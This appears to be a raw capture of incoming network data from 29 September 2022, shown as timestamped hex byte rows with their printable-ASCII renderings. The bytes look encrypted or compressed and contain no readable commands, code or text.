                                                                                                                                                2022-09-29 12:51:45 UTC24953INData Raw: e7 9d 16 65 29 f0 c6 8d 4e 4b c9 34 b5 38 44 f3 bf cb f3 78 7d a8 b6 b8 f3 82 4e c8 ee c4 21 4d e6 83 4b 05 b2 f6 93 dd d7 c0 95 e1 0c 69 19 10 a9 ba fc b6 c4 60 e2 25 95 5b 60 c1 2d 9b e8 ec 62 f9 b6 db ca 6c 27 d1 52 96 2c 6a bd 28 aa ad 96 d1 44 9e 11 1f 05 f7 81 68 50 1a be 37 80 71 d6 98 83 73 9b dd b4 45 01 8e f2 48 91 d4 ce 8e c9 c5 f2 63 96 0a 59 e3 fc ef 2b 32 26 e7 22 55 35 3a cb a1 4e 1a a2 c5 7a 15 ca 30 e5 66 95 9a a0 82 29 2e 78 7a ab 02 50 87 7b 9b e8 eb dc 44 02 ee 49 2d 33 64 64 72 0b 51 ce be 0c 24 cb 52 c5 e0 6c 95 9f 12 61 14 57 1a dc 9b 3a 7c 40 21 f8 95 94 ea 12 e8 03 e8 be af 65 35 3e 8d 8d 23 af 7d 62 96 2f dc 6d ad 66 ea e8 c6 89 6b 2c 57 fb ad 4b a4 24 5d 20 90 34 3f 42 c9 b4 b0 a4 60 a1 50 b2 be 83 d2 e7 80 36 36 07 77 ac b0 91
                                                                                                                                                Data Ascii: e)NK48Dx}N!MKi`%[`-bl'R,j(DhP7qsEHcY+2&"U5:Nz0f).xzP{DI-3ddrQ$RlaW:|@!e5>#}b/mfk,WK$] 4?B`P66w
                                                                                                                                                2022-09-29 12:51:45 UTC24969INData Raw: 3f 3d 8b 7a 09 9e 93 3a 7b 76 7e 0d 4f dd 22 1e 5f 99 9d 94 50 70 46 ad da 2d 4c 76 35 c4 08 11 44 21 66 31 3e d0 52 2d c5 29 90 74 68 3e 10 e8 05 ab 26 05 ea 32 5e ab d4 23 56 68 ec 14 80 84 e1 5b 21 82 71 e1 2b f0 56 38 2c c6 29 d3 e2 ac e9 f7 cd f9 4f 19 eb 9e 9b af f7 f5 40 7c 21 07 9e 9a 59 f4 f7 dd 4b 6d fa bf db 36 77 33 b7 1a bd 01 be b1 be 29 43 3d 1f 6e 6c 88 65 2e 2b 13 ef 48 30 ef f1 28 4d 25 b8 a9 64 11 21 68 09 69 9d 63 e0 55 c8 fd 0b 21 0e 4b b7 34 d8 55 f3 61 11 19 44 df ee ba 0b 87 41 51 7b cd e6 1b 7a c6 e6 ec 53 96 6d 8b 99 14 d2 ea c7 d9 de 95 f2 fe cb 48 a6 c6 a4 6c a6 63 e6 80 82 cc 57 1b 22 57 cd 56 1c 10 3b 89 b7 92 ad 57 05 24 df 38 ba bb 5e 9d 49 5f 62 43 2e 8c 85 c0 7a 91 2f df ad 8e 74 8d e5 d0 dd e6 27 56 1e 28 e4 9a d5 dd c5
                                                                                                                                                Data Ascii: ?=z:{v~O"_PpF-Lv5D!f1>R-)th>&2^#Vh[!q+V8,)O@|!YKm6w3)C=nle.+H0(M%d!hicU!K4UaDAQ{zSmHlcW"WV;W$8^I_bC.z/t'V(
                                                                                                                                                2022-09-29 12:51:45 UTC24985INData Raw: fc 10 c0 c8 3d 3b 75 c2 34 83 fd 8a d8 ce 4f 60 43 d7 3f 2a 62 2b 51 ea 14 69 eb 16 32 ed 45 56 a2 c2 dd 8f 0a 5e 0b e9 17 e9 08 de 58 50 77 a2 47 23 ef 70 dd e2 5d c0 de 73 0f 50 0b a1 5f 0b 05 d8 48 6a 5e 32 d8 ef 33 c0 1b 74 79 8c 93 bc 5c e3 4a a0 19 f2 7a 7d 87 13 3a 67 43 11 2c e1 f0 33 e3 7f 6a a8 3e 3a 63 88 32 2c d8 19 d2 fa 5a c8 d7 9c 6a 81 71 ac 7e b6 d9 5a 7b 6f 87 88 dd 3f 9b 37 99 35 52 83 cf 22 a4 c1 68 b7 79 8a 93 a8 0a 25 94 9e 27 f5 b2 10 36 64 62 38 28 68 f5 3a dd 68 5a 50 52 a7 30 f2 af 42 bf 26 75 5b 8a 8e bf b1 65 4c c4 2d 3a 03 0d 8d 2b 29 0f 04 34 ec e2 30 9e 2e 2f a3 ad 46 9b a8 85 a8 23 1f b3 76 37 f2 ce 51 1c a4 c4 62 be e1 67 f6 c6 b8 11 c6 91 d0 7e 9a ba cb 46 12 0b 39 8e da 28 2b 09 04 3d f6 0e 0b 93 9f 6e f3 b8 9e f9 19 f2
                                                                                                                                                Data Ascii: =;u4O`C?*b+Qi2EV^XPwG#p]sP_Hj^23ty\Jz}:gC,3j>:c2,Zjq~Z{o?75R"hy%'6db8(h:hZPR0B&u[eL-:+)40./F#v7Qbg~F9(+=n
                                                                                                                                                2022-09-29 12:51:45 UTC25001INData Raw: 8c ad 94 93 0d e8 80 4f 9f c0 71 87 6e e1 6d b8 23 ac da 32 8d 81 b1 68 7f 50 5e b0 b9 e7 3e f4 1d 60 3d 6c 97 9b 64 96 7b 54 c9 f6 3b a2 3a 8c d1 7d cc 6e 5c e9 0c 4e 8c 93 63 82 06 a0 cd 6a c1 fb 0f ae 79 72 bd 71 77 b9 96 ea aa b9 05 69 d0 01 cc 05 6f 38 77 27 89 fa 69 e5 e3 3b dd 7a 86 26 b7 e2 e4 d8 78 ff e1 f6 19 fb e0 3a 11 bd 14 2f 58 5b b7 11 75 3e 40 e6 89 55 2e 88 b8 07 81 e8 e5 b2 98 1b 6b c0 4f fa 44 28 dc 18 8d d2 42 4c 79 57 44 84 d8 85 bc 12 72 a0 34 99 1a ab 4f b5 25 86 46 c4 dc c4 8c 46 5c ae 0a e5 7d 50 12 5b ad a3 9c 5f 59 d8 45 03 f7 d9 44 0c 99 00 79 0d d1 d1 0e 21 82 49 4b 3e 98 76 94 5d 38 4d b3 26 7d 9c c3 03 ed 61 84 2e de d0 ff fb c3 df 9a 84 e2 8c 78 d7 3e 55 06 40 94 bd 5e 38 80 db 2b 57 e0 80 0c 9c 2c b4 5a dc 2d 0f 82 da bc
                                                                                                                                                Data Ascii: Oqnm#2hP^>`=ld{T;:}n\Ncjyrqwio8w'i;z&x:/X[u>@U.kOD(BLyWDr4O%FF\}P[_YEDy!IK>v]8M&}a.x>U@^8+W,Z-
                                                                                                                                                2022-09-29 12:51:45 UTC25017INData Raw: ba 4d cd 05 e7 fa 94 d1 09 99 fb a3 1c 68 9f c3 5b 00 00 81 e8 0f 77 6e a7 fe 5c 81 3c aa 11 2f ea f9 a9 d8 31 2c 03 e2 47 4b a6 a8 6f 44 bf 46 a8 41 89 1b 0a ab cf 08 ae a6 92 3c c6 1d 47 f5 4c 85 14 3d b6 26 15 7b 5e 5a 41 c6 27 9b 4f b5 ba f6 8c da 86 f5 3f 33 2b 46 5e 30 6a 6e 50 28 d0 7e 70 6a 69 c8 ce b9 82 e5 56 5c 55 10 5f 80 53 d8 44 69 7e 8c 51 43 64 cb 01 c0 55 de 7b 35 a2 1f 07 b3 6c b0 41 e8 4d ed e7 c6 16 8a c4 39 32 9e ae e3 59 12 77 0d 8b 41 79 5b 48 8b 9e 6a 1b 79 fb 55 b1 99 74 43 70 d5 38 99 b6 87 03 b9 d3 d5 8a 47 17 07 12 8a a3 5c a5 73 2c 5d 3b 70 fb b0 a7 d4 ca 1a a9 d2 3b d7 d9 30 2f 65 31 36 7e 87 05 dd 83 c0 a2 58 87 1e d8 10 40 fc 50 b2 99 bd 8b 0f cb d3 ae 24 7c 9c 64 6f d6 b2 c5 40 dd 94 a5 6d 9d 72 2c 41 98 7c 2d a2 41 ed fc
                                                                                                                                                Data Ascii: Mh[wn\</1,GKoDFA<GL=&{^ZA'O?3+F^0jnP(~pjiV\U_SDi~QCdU{5lAM92YwAy[HjyUtCp8G\s,];p;0/e16~X@P$|do@mr,A|-A
                                                                                                                                                2022-09-29 12:51:45 UTC25033INData Raw: 12 a8 30 c4 15 87 44 40 fe d3 be 1a 7d 85 7f 04 0d fc b2 95 19 fc ee 19 8e f3 54 ee 0a 21 d0 49 27 7c 0e 90 77 38 69 34 c5 3f 74 0b 5f c9 ee db b8 33 10 9b 3f 4f e3 65 16 da c0 e0 48 6a 58 cc 2f 05 11 ee 71 ee 99 b3 96 7b 7a 9d 63 ce ae 3c 11 38 93 58 b7 42 2d 60 11 2f 0a af da 2e 32 3c dd 44 e0 8b 37 e4 3e e8 44 bf e1 22 73 67 20 aa c9 94 a1 79 86 1a 55 bd 7a 47 52 94 60 08 29 9e eb 7a 69 71 70 73 39 06 2a e0 e4 17 08 fd 20 3d ad 28 e6 2c 19 12 73 96 c4 d2 5a b0 12 4d 04 73 c3 9d ff 01 c9 08 06 44 c9 09 0b 7a 8a d1 ab 54 f4 6a f1 ef fe f1 79 94 ff f2 65 e5 27 39 7b 9f e5 ef bc 95 5a ce 10 59 05 96 f1 f4 8e 9a 05 9a 3b d2 1c 38 5a ad 74 a7 3d 14 1f 69 aa e8 14 c0 86 99 28 d1 ec 53 c5 58 ea e9 a7 f9 8d 51 ca c4 cf b5 d1 bf 11 71 1b fc bf c2 80 9c 47 63 1d
                                                                                                                                                Data Ascii: 0D@}T!I'|w8i4?t_3?OeHjX/q{zc<8XB-`/.2<D7>D"sg yUzGR`)ziqps9* =(,sZMsDzTjye'9{ZY;8Zt=i(SXQqGc
                                                                                                                                                2022-09-29 12:51:45 UTC25049INData Raw: 5e 5d 1a 1f ab b8 04 11 9b 04 85 c7 53 94 04 ad 96 28 ef 55 a0 5d 58 6a d3 3f df 5b d4 1d 62 ab 6d eb b0 7b f1 cf e3 e5 43 4b 47 ba 70 39 3c fc 23 7c f8 e7 f5 36 2d 88 dc 7c 68 c3 72 12 a5 f4 51 37 0f 65 cd 30 5a 38 8e 83 d1 38 e6 18 b0 84 4d 8c 01 e1 82 fb 66 25 5a 30 1c 83 62 34 65 75 f3 2c b3 8b 25 77 27 f7 8d 29 28 e3 99 9f 9b a4 87 9d ee 3f 9e 26 4a 23 9e 61 d8 89 b4 9d 86 34 32 55 4c 32 f2 80 52 06 a8 ca 5e c0 40 bb bd b3 a7 15 10 18 9d 75 b7 94 e3 c2 d3 47 19 79 4d 23 7d d1 c2 58 eb b3 48 a3 87 75 c2 bb 38 97 0a 77 45 82 23 88 67 a1 67 93 8b 4a 76 b1 3c 21 3d a8 97 5e 33 4d 80 5d 56 49 28 ec c3 e0 e3 38 68 d0 d7 de f8 f2 1a e9 22 5a dd 9d dc c0 b9 ef 59 b7 3b 65 96 63 cf ba 2b 9c 63 3c 6a db b4 08 42 6c 7e 58 ea 23 1e 35 8e 2a 41 79 92 5a f6 09 5e
                                                                                                                                                Data Ascii: ^]S(U]Xj?[bm{CKGp9<#|6-|hrQ7e0Z88Mf%Z0b4eu,%w')(?&J#a42UL2R^@uGyM#}XHu8wE#ggJv<!=^3M]VI(8h"ZY;ec+c<jBl~X#5*AyZ^
                                                                                                                                                2022-09-29 12:51:45 UTC25065INData Raw: 74 bc ee 1f ed d2 55 72 e9 14 91 b3 d7 e3 c4 4c e6 5b 8f 3e 4c 1b 8c ba 08 9a 4c 8a c1 ee 3c c5 6c 92 3d 34 94 8c f4 05 cf c2 8d 25 e5 3d f6 7e 9d 4e d2 f0 96 e2 65 b7 c2 56 2e 09 43 66 98 40 fc e9 50 96 0d 02 ea de 8c ac b1 51 96 b3 37 54 fb 30 d0 12 54 b1 2f 0b 8e 82 3a 84 4c 22 51 5c 3d d8 ac 54 b5 a3 62 34 12 2a ce 59 82 fe 43 5c 1a b8 68 ea 3c 32 9a 79 99 b9 28 b1 49 75 11 0d 8b e9 42 be c6 b5 d1 b0 a4 22 25 f5 a7 9c 9b 13 59 bf 62 81 2d da 9f ab 66 6d 8d f8 93 30 f5 74 56 34 6a 89 2c 6a 85 e7 82 ab 02 5c 11 a6 1a 18 3c ae 85 ff a5 92 ed 1c ba eb 50 bf bc 92 ed ed fc 38 04 ee 85 8e 20 0f 2e 26 7c 8e 2a 4f fe cc 35 c8 0e a2 bc 0d 48 40 f5 29 33 8a 54 32 3f 78 d9 a7 b4 85 ba 9a 1b b0 15 11 47 d4 3c 43 d6 25 f3 18 89 83 26 c7 31 d3 43 c7 b4 c5 bb d1 5c
                                                                                                                                                Data Ascii: tUrL[>LL<l=4%=~NeV.Cf@PQ7T0T/:L"Q\=Tb4*YC\h<2y(IuB"%Yb-fm0tV4j,j\<P8 .&|*O5H@)3T2?xG<C%&1C\
                                                                                                                                                2022-09-29 12:51:45 UTC25081INData Raw: dc 00 d8 73 13 48 43 9f b8 3f 27 5a f3 05 cf 8a 64 67 99 f2 9d 6c 68 19 61 30 83 df 9f 0c e6 3a 77 6c 6a 0e a5 53 77 9b e9 b7 3f 77 a6 15 b7 ba 36 30 40 c9 be 03 f6 55 70 52 90 a7 02 0b c4 c9 e5 e9 1a 40 7f 71 8c e6 c8 7c 24 b3 7b d0 f9 d8 8a 23 46 ca aa 05 f3 e1 d9 41 1d ba 98 7b cb 8f 31 02 b8 9d 61 12 93 31 f9 dd d6 1e d1 3e 52 70 3b 03 8f 0c 6b f8 06 8e ff 4d 48 9a 1f 26 2c a7 91 0e 15 c0 8e 7f d8 50 3d 9b c9 8f c1 73 c0 48 86 0d 76 0e bc 4b 2a 72 d6 f2 6a c1 34 c6 45 bc 31 3c ed bb b8 b2 f5 c5 ec d1 2a 22 c8 98 a3 32 9e 99 06 cd 6d 7a 78 c4 10 50 f6 40 d6 ff 73 30 29 57 44 8d 01 8d be c7 02 54 90 91 5f 70 3b 40 c3 65 89 37 32 eb bf c6 2c 0e 23 7e 7e 8b 5e 8f 2c 07 40 80 0d 38 c4 19 de 9e 46 c8 27 74 74 8b b2 d8 b6 10 28 7d ad 47 3e e1 5b 53 83 11 be
                                                                                                                                                Data Ascii: sHC?'Zdglha0:wljSw?w60@UpR@q|${#FA{1a1>Rp;kMH&,P=sHvK*rj4E1<*"2mzxP@s0)WDT_p;@e72,#~~^,@8F'tt(}G>[S
                                                                                                                                                2022-09-29 12:51:45 UTC25097INData Raw: e8 73 b6 53 14 f6 13 3c f7 21 60 69 3f b8 13 34 a5 a6 2b b5 24 ec e0 24 2b 5b 59 6c dc 05 26 5c d2 ef be dc d3 43 9b 6f 7b 73 d4 31 31 e9 d6 df b9 e7 37 cf ae 38 b5 dc 16 0d ac af e5 07 2d d8 73 67 78 1b a0 3a 7d 77 14 14 aa b7 f4 7c 1d d3 9d e9 7b 65 b9 4b 33 89 f2 72 c7 b5 87 56 3e 7d 20 a4 8a 74 a5 9e db 95 bc cb 11 78 e2 06 06 e6 f6 86 dd c5 35 95 e8 ea 5b 08 cb bc a5 ab fb 92 a9 b4 fb 9c 1f 55 68 22 5c f1 31 a2 f1 42 e1 0e 47 6e 84 f4 c2 73 0a fb de 24 55 91 02 bb 77 7c 88 ef 3d d4 0f 3b a6 9d 4c 39 24 4d 96 23 51 c2 f0 f4 a2 b1 73 59 72 b0 e7 e5 ba 01 d5 99 88 38 51 2f 6b a7 f2 1c 18 2a b5 ca 2e e1 ac ef 05 0e b2 2f 34 69 54 2e 32 fa 8b 39 72 43 0b ba f4 99 11 4d 53 63 61 7a fc 4c e5 ba e6 a8 29 7a 85 0a 98 70 09 69 ee cc fa 80 e5 16 3f ac e5 58 6a
                                                                                                                                                Data Ascii: sS<!`i?4+$$+[Yl&\Co{s1178-sgx:}w|{eK3rV>} tx5[Uh"\1BGns$Uw|=;L9$M#QsYr8Q/k*./4iT.29rCMScazL)zpi?Xj
                                                                                                                                                2022-09-29 12:51:45 UTC25113INData Raw: f5 76 65 d0 78 2f 35 0f 68 1f a8 e2 40 ec ea 2c 5c 0a 86 44 5d df c7 4b 4b ff 47 d2 05 37 a6 cf 5d 71 a4 64 69 cb ed a9 7e 56 1f 5d 34 66 0e de 1e 12 20 ad 7e 2c 22 60 f6 12 92 0b 55 83 ed de b2 d5 65 da 03 a4 cb 19 46 95 9d b1 66 c8 73 45 04 06 3f 7d 7d e8 ed 86 85 ef 99 ec 81 3a 9d d7 bc 20 bd 79 ee 0f 65 c2 d2 24 a9 ba 75 14 63 70 00 49 c0 57 e0 56 33 b5 7f b6 a1 1f 7f dd 51 f3 08 ed d3 73 3f ec a0 57 3b 33 06 b8 1d 4e 7f d4 5b b7 ed 53 24 e6 68 29 15 f3 47 01 a5 0f f7 3c d5 59 5d cc 9f 13 08 db c4 8e 94 a0 a7 68 a8 f3 03 5b 68 54 18 e7 76 08 2d b3 08 59 66 25 90 4b 35 37 10 a1 18 24 00 90 2d f8 7c c0 3b 82 4c e4 06 07 53 a2 f6 1f 10 aa 5f de 5b ad 0e c1 8e b1 ad 0b 02 29 3d 37 99 b6 18 29 8e 61 6f ed 8d 59 97 e2 1f 2e 9d d3 8a 59 1c e7 f2 f3 7d 66 7f
                                                                                                                                                Data Ascii: vex/5h@,\D]KKG7]qdi~V]4f ~,"`UeFfsE?}}: ye$ucpIWV3Qs?W;3N[S$h)G<Y]h[hTv-Yf%K57$-|;LS_[)=7)aoY.Y}f
                                                                                                                                                2022-09-29 12:51:45 UTC25129INData Raw: ce 78 b1 f1 9c c1 fb 33 2d 60 bd bb a5 92 3f 38 5d ec 50 48 c2 6c 37 51 08 f7 56 1b c7 69 37 32 4c 4d 8e ba 30 60 49 d3 95 69 f8 40 32 87 9a 3c 77 54 82 73 f3 1b a5 ca 68 b0 81 95 64 3d bc 2d be 3d 3f 7e 7a fe 87 45 51 b2 ba fd c2 e4 83 6b 42 a2 54 32 90 bc 28 2a 01 9c c5 83 d1 01 5f 3c 64 89 a8 83 dd 7e 12 63 a9 4e f5 83 81 0c 9b 95 d8 fe cf 86 1b 5d f4 5e 51 9c 57 48 52 aa c1 b1 89 0b 93 09 aa 5d 3f 2e da dc fe 82 de a6 d1 5a 20 bb 50 bc 49 75 3d dd 66 87 0c c4 d0 34 c8 81 df ab db 45 66 c5 b7 c2 60 22 77 f4 60 83 db 84 76 19 f6 b6 7b 31 7c 5b f5 c3 fd 21 ac 07 78 f9 d0 d9 61 32 db 2e 50 ce 42 e1 1e c8 68 8d 11 0c 00 4c 6e ce 81 1a f5 d9 a1 87 72 5b 36 23 d0 af 53 ce e5 29 6d 53 9e 7a f1 83 6e 81 9e 41 30 58 d1 ab 8a be f8 e7 1c ca 88 a9 93 83 44 0e 9c
                                                                                                                                                Data Ascii: x3-`?8]PHl7QVi72LM0`Ii@2<wTshd=-=?~zEQkBT2(*_<d~cN]^QWHR]?.Z PIu=f4Ef`"w`v{1|[!xa2.PBhLnr[6#S)mSznA0XD
                                                                                                                                                2022-09-29 12:51:45 UTC25145INData Raw: f4 32 94 2e 2e 9e 9e a1 27 5d 0d 28 97 87 e0 43 7f c9 ea b0 3b 60 96 8b 4e c7 82 c5 2e 4c 8d 77 1d f1 82 7f 7d ff f8 4c 9f b7 c4 b6 72 04 e7 81 4d b6 c2 fc 3e 3d 05 ae c3 e9 30 d2 5d f5 11 1e 67 ff 09 d1 74 73 e1 f8 c5 92 c3 e3 fe e3 66 a6 f7 25 12 97 95 2c 58 22 0e af dc e7 3f e4 b2 c6 5c 50 8b 27 ad 03 b7 0a 4f 3e 61 ca 99 83 4e c5 eb b8 99 fc fc c8 28 1b 8f 09 94 c2 4c f9 9b 7e e8 06 01 f8 d0 53 0f b2 f7 64 86 f1 a0 41 f6 a9 4c 29 e9 a7 7b 8d 30 d0 74 22 7e a7 c9 4d c6 c0 ee 39 12 1c b9 9a 2a 48 4c 3b 3d 5c 06 cf 6c 7c 6f ce b5 fc 72 35 88 01 dc a9 e0 76 4d e3 81 19 0b 61 ef dd 78 52 0a 86 ce c0 a1 25 ce 1c f5 c4 f2 b6 be 74 80 a4 91 62 e1 a2 c9 3e 6c d5 21 0e e5 64 cf 99 0f 76 19 ba f0 ca 0f c5 9a a0 0e 55 b3 c2 9a 24 28 79 a0 61 df 42 4c 74 cb c0 8d
                                                                                                                                                Data Ascii: 2..'](C;`N.Lw}LrM>=0]gtsf%,X"?\P'O>aN(L~SdAL){0t"~M9*HL;=\l|or5vMaxR%tb>l!dvU$(yaBLt
                                                                                                                                                2022-09-29 12:51:45 UTC25161INData Raw: f3 48 cf f9 67 82 ef cc 41 ac 2e 6c ce cf 5a 6e 8e d5 71 10 35 99 81 71 86 9b 9f 3d 9e c7 55 ed 0a d0 07 24 e7 de 3d b1 23 ed 53 a6 ca aa 07 bc 0e 63 8c b6 fa 15 21 dc 04 59 0a a8 bb 0e 5f 43 f5 5f 83 e9 ca fa cc bd 79 e6 c7 8c 77 c3 08 74 41 90 20 6a df 10 a2 c3 4e eb be 22 e2 01 d8 e1 7c ad f4 d2 04 64 d4 ed 92 67 76 e9 fd e3 93 59 ba d8 f5 4a 7b f3 c9 08 b5 cb b4 3a b9 68 92 56 05 46 75 63 7a 0d 57 b4 ff 70 f6 7b 98 e6 81 e6 6f fb 1b f4 fc d4 0f 6b ae 0b 81 4d 7f 36 6d ac 42 46 21 f7 b6 db b1 20 62 48 f7 81 49 bb 1b 2d 42 02 f9 69 b9 c5 e6 9b 28 5f e6 94 f7 4a f1 7a be 68 c6 0e ad 47 b5 23 05 28 f6 71 f5 3c aa 0a 0d a7 69 de 23 44 08 de 1c ce af c7 5a 0e 68 79 92 58 93 76 f4 79 84 14 76 cf 29 95 48 9a e2 2d d4 5e 1f b8 cd 44 58 4b 97 5d 85 5e ed 29 4d
                                                                                                                                                Data Ascii: HgA.lZnq5q=U$=#Sc!Y_C_ywtA jN"|dgvYJ{:hVFuczWp{okM6mBF! bHI-Bi(_JzhG#(q<i#DZhyXvyv)H-^DXK]^)M
                                                                                                                                                2022-09-29 12:51:45 UTC25177INData Raw: e2 4d 8f aa 80 b4 11 98 02 3e 3b 27 1e 5c e8 76 67 06 09 cb 5e 2b fa d8 5c 2e 6b c4 ac 39 f2 ec a8 1a 93 14 09 09 c6 41 94 68 70 a5 4f 3a b2 5e d4 65 eb e8 51 e9 4d 36 48 70 86 50 f3 63 83 16 bf a1 1a fa 09 b9 7c 8f ef c1 0d c3 db 4a 60 26 7a f1 7c ab 3c a3 6e d0 c4 83 b5 8a 8d 2c 01 51 09 23 fc 24 4b 58 d4 7c 93 80 33 35 a0 77 22 11 2f 81 6a 35 e3 9c 53 13 4d 11 cb 4e 87 32 96 07 4f 34 87 82 2e b0 95 c9 fd 28 ab 15 50 6b 1b 8c ae 60 66 3f ca 52 21 37 f5 30 5e 0b b3 d2 a9 b8 11 73 ea ae 81 e5 ba af 3b 2b 0e d3 f0 5e 94 ce 29 2e e9 56 60 3d e5 2f 8d 97 63 c8 15 46 7c bc 52 37 dd 69 b8 36 8e b0 f5 17 8e 74 b7 fe 21 de a5 b9 a0 eb ee c2 c6 4c 83 de 75 02 e7 d8 06 a6 d7 d5 9f e9 ca 85 83 f3 33 4c d7 6c 61 dc ff 49 80 2b 02 2c 1c c2 5e 80 15 02 7e fc d7 47 27
                                                                                                                                                Data Ascii: M>;'\vg^+\.k9AhpO:^eQM6HpPc|J`&z|<n,Q#$KX|35w"/j5SMN2O4.(Pk`f?R!70^s;+^).V`=/cF|R7i6t!Lu3LlaI+,^~G'
                                                                                                                                                2022-09-29 12:51:45 UTC25193INData Raw: af fc a3 6e 42 c5 62 85 ac be 60 3e 80 93 d5 af 27 b4 b4 2f fb f7 d8 92 87 1e 15 9c a4 14 ac 8d f4 27 b3 1e 74 5a 6f 43 e3 4f 0d 79 c6 69 bc a1 1d 0f a3 94 b1 dd 1e e8 f8 72 32 6f 0d bf 57 84 22 87 90 87 0e b3 dc 13 64 49 74 6b 92 25 1b bc ae 06 cb d8 5a 6d a9 7f d6 6c f3 61 ae 20 f4 dd 99 46 49 3b 5e 18 c6 cb ce 79 a2 0b 94 8b c9 60 6d 3c 19 52 08 f7 f2 28 b8 34 12 ff 1a 86 80 61 81 c6 53 88 92 85 20 38 38 86 85 31 cd 90 b5 41 93 fc 7c a5 8e 08 2b 89 7e 10 aa 1d 0c 38 50 38 85 a9 63 a1 d7 4f 58 24 9f 72 8a d5 f5 77 5f 2b f5 cc 83 46 f3 e6 5e 68 5e 97 c3 47 81 d1 be d5 5a 09 ec 44 35 dc 6f 6a 35 74 d0 af 53 27 cd d5 fd 44 c8 5e e3 e7 c9 fe 14 2d 5a 11 44 6f 94 3b f6 f4 52 a9 e2 81 52 e2 c0 f0 72 9f 09 44 b5 62 37 5e 7d bc f0 40 59 c8 73 e4 ba fd 76 56 51
                                                                                                                                                Data Ascii: nBb`>'/'tZoCOyir2oW"dItk%Zmla FI;^y`m<R(4aS 881A|+~8P8cOX$rw_+F^h^GZD5oj5tS'D^-ZDo;RRrDb7^}@YsvVQ
                                                                                                                                                2022-09-29 12:51:45 UTC25209INData Raw: bd f1 6e 3e 58 2f ed 36 3e 82 90 35 ca d0 80 81 42 db 58 c2 4d 88 da 0e c4 97 d4 04 d4 6f 6f b9 83 f3 9a 8d 35 68 02 c8 8f 5d 2c eb a8 66 ba f0 15 1d 65 5a f8 d2 3f e2 7a 18 7b 01 4b 94 4e b2 ec 4f 97 1b 09 ca c9 7f 2f cf 91 89 a6 62 c2 43 01 27 7c 20 f1 b6 03 e8 d8 4a 1e 9a 35 d9 dd 33 ca 33 74 90 1b 96 0e e5 26 78 7c 74 02 76 f2 c5 7b 9b 6b c7 f4 1e b5 a9 78 c7 4b 05 c1 7f 47 36 3f cb d5 34 d2 e4 b8 e1 d0 e6 3d 20 e2 66 c5 ef b1 96 54 01 4d 89 a2 13 ab a0 87 3c 76 40 5f 49 68 b0 b9 60 a5 4b 2e a1 6b ed 4f 0b af b9 33 0b 35 eb 00 44 7e fa 88 e4 2c dd 55 e3 71 63 3c 98 d3 07 19 57 92 27 f0 0a 2d b9 01 0e 57 9d b2 f7 5f ec bd 08 9f b3 74 73 fa 1b e0 40 ac e6 dc b5 53 37 96 ae 28 42 17 8a 59 33 be 75 57 1f c0 58 f7 99 65 74 2c 75 7f de ab e5 04 f1 71 c7 81
                                                                                                                                                Data Ascii: n>X/6>5BXMoo5h],feZ?z{KNO/bC'| J533t&x|tv{kxKG6?4= fTM<v@_Ih`K.kO35D~,Uqc<W'-W_ts@S7(BY3uWXet,uq
                                                                                                                                                2022-09-29 12:51:45 UTC25225INData Raw: e7 41 67 2c 1c 20 b7 a6 53 1f cf 4a 2d f1 a5 f0 1d c4 2d 8a e3 e5 01 14 3b a3 4f 6c ef 54 b0 f2 0a 65 9e 1d 1b a5 e3 8b a7 08 66 36 0c 0f ac 9d 6c c9 49 44 98 14 a4 94 6a 5a ca 95 04 2c 37 1e 0b 4f 2e a5 c1 03 0d 82 42 aa 27 08 3e 9a cf 20 2e 8e 6e da 69 e2 f8 17 7c 3f ff e2 38 4e f8 6a f6 b2 5a f2 c1 d0 4e f1 cc d8 fe 95 54 a7 d3 15 d1 d5 41 76 f7 61 61 22 5f b5 3c 83 e0 43 0e b5 92 09 66 be e8 a8 36 88 e6 90 0e 11 7d 53 dd 63 c7 6d 7f cb 8d 06 a4 e7 c1 86 3c 67 3c 10 f1 47 54 74 81 28 8d 54 9d af e8 27 ac 12 9b 4b f8 43 fb c7 1b 86 70 9b cb 98 03 f6 4c a9 fb d4 39 3c 15 59 ad 6d d7 41 3f 88 c7 d0 45 2f 64 48 8f aa c4 be 2b b5 cc 78 9d 37 8a ce d5 be c0 92 84 d0 aa a3 ce 35 7b 9d 45 73 07 5d 19 e3 a8 38 45 8d 34 c0 6a 66 9d 5a 6c e4 75 77 aa cf 4f 0b 7e
                                                                                                                                                Data Ascii: Ag, SJ--;OlTef6lIDjZ,7O.B'> .ni|?8NjZNTAvaa"_<Cf6}Scm<g<GTt(T'KCpL9<YmA?E/dH+x75{Es]8E4jfZluwO~
                                                                                                                                                2022-09-29 12:51:45 UTC25241INData Raw: 48 f6 ac 4d 54 ed f3 d2 fb 92 6d 77 51 18 e9 25 38 37 92 14 bd ce e1 9a 5a 65 3b 2a aa 6f ea c9 d2 74 51 47 26 00 13 60 9b 85 6a fe 07 54 59 95 68 b8 fa f1 b0 0a f8 de cf d8 d8 6d 3f ec fd 33 37 3e 3d 06 70 f3 f6 50 9b c5 73 6f 2d 4f 58 19 41 e9 78 ed b0 b5 28 96 a9 26 c0 de d8 8f 3d 65 e9 84 fb 4a ec ab ed dc 6e 2b 62 57 e8 cd 67 88 e5 a1 ff 0c 91 06 7b c8 27 ab 09 52 bd 01 ec 7c f3 02 0c c5 be dd ab 9d ee b9 18 83 8d 37 34 61 0d 9f e8 cb 6c fd 60 5d 46 e8 0c 31 8e 18 61 8b fb bf 55 a7 70 e9 64 78 e3 5e f4 d0 93 4e 81 80 12 40 83 93 c7 c8 82 9f 6a 17 e3 7c d8 43 5d 03 3e ed 27 de cd 68 cb 61 1b fe 4a 24 6d 36 ba 64 a8 76 1e e0 d0 36 c7 23 60 64 2a d4 d0 0d 74 63 6d e7 e1 81 14 87 50 0a ed 8e 64 a6 4c 9f ad 78 be f7 9f 94 a0 a9 7f a8 69 5f 6c df a6 59 bc
                                                                                                                                                Data Ascii: HMTmwQ%87Ze;*otQG&`jTYhm?37>=pPso-OXAx(&=eJn+bWg{'R|74al`]F1aUpdx^N@j|C]>'haJ$m6dv6#`d*tcmPdLxi_lY
